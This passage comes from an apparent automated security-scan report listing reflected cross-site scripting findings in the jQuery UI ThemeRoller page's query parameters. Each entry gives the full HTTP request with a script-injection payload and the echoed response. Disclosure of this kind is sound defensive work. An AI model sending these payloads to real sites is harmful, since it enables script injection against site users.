GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=4545459cee7"><script>alert(1)</script>abd743a9c48&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=4545459cee7"><script>alert(1)</script>abd743a9c48&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pn
...[SNIP]...

2.167. http://jqueryui.com/themeroller/ [iconColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87e87"><script>alert(1)</script>a3ea86a304c was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22222287e87"><script>alert(1)</script>a3ea86a304c&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
derColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22222287e87"><script>alert(1)</script>a3ea86a304c&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpaci
...[SNIP]...

2.168. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc50e"><script>alert(1)</script>3faf1eb1fc7 was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888dc50e"><script>alert(1)</script>3faf1eb1fc7&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888dc50e"><script>alert(1)</script>3faf1eb1fc7&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=6
...[SNIP]...

2.169. http://jqueryui.com/themeroller/ [iconColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46104"><script>alert(1)</script>3928c085e5 was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a46104"><script>alert(1)</script>3928c085e5&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a46104"><script>alert(1)</script>3928c085e5&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&of
...[SNIP]...

2.170. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8814c"><script>alert(1)</script>b9661bee4fa was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=2222228814c"><script>alert(1)</script>b9661bee4fa&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=2222228814c"><script>alert(1)</script>b9661bee4fa&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOp
...[SNIP]...

2.171. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ef9c"><script>alert(1)</script>ed8429324bf was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff7ef9c"><script>alert(1)</script>ed8429324bf&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
e=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff7ef9c"><script>alert(1)</script>ed8429324bf&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay
...[SNIP]...

2.172. http://jqueryui.com/themeroller/ [iconColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd783"><script>alert(1)</script>5297cb49336 was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545cd783"><script>alert(1)</script>5297cb49336&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:33 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
t=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545cd783"><script>alert(1)</script>5297cb49336&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpa
...[SNIP]...

2.173. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58e9c"><script>alert(1)</script>97c25945815 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?58e9c"><script>alert(1)</script>97c25945815=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:27:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 117121

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&58e9c"><script>alert(1)</script>97c25945815=1" type="text/css" media="all" />
...[SNIP]...

2.174. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5b20"><script>alert(1)</script>b5290387e91 was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxe5b20"><script>alert(1)</script>b5290387e91&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:30:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxe5b20"><script>alert(1)</script>b5290387e91&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.175. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb683"><script>alert(1)</script>eb19ef13760 was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8pxeb683"><script>alert(1)</script>eb19ef13760&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:30:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
aaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8pxeb683"><script>alert(1)</script>eb19ef13760&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.176. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2e1a"><script>alert(1)</script>f81de3072b1 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

